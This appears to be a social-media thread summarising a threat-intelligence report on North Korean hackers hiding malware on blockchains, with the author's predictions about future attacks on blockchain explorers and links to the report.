NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain.

Result, decentralized, immutable malware from a government crypto theft operation.

It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server)

Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.

And Blockchain explorers are a natural target.

Nearly impossible to remove.

Experimentation with putting malware on blockchains is in infancy.

Ultimately there will be some efforts to try and implement social engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is going to be productive for a long time.

Still, where here they used social engineering, I expect attackers to also experiment with directly loading zero click exploits onto blockchains targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets.

REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding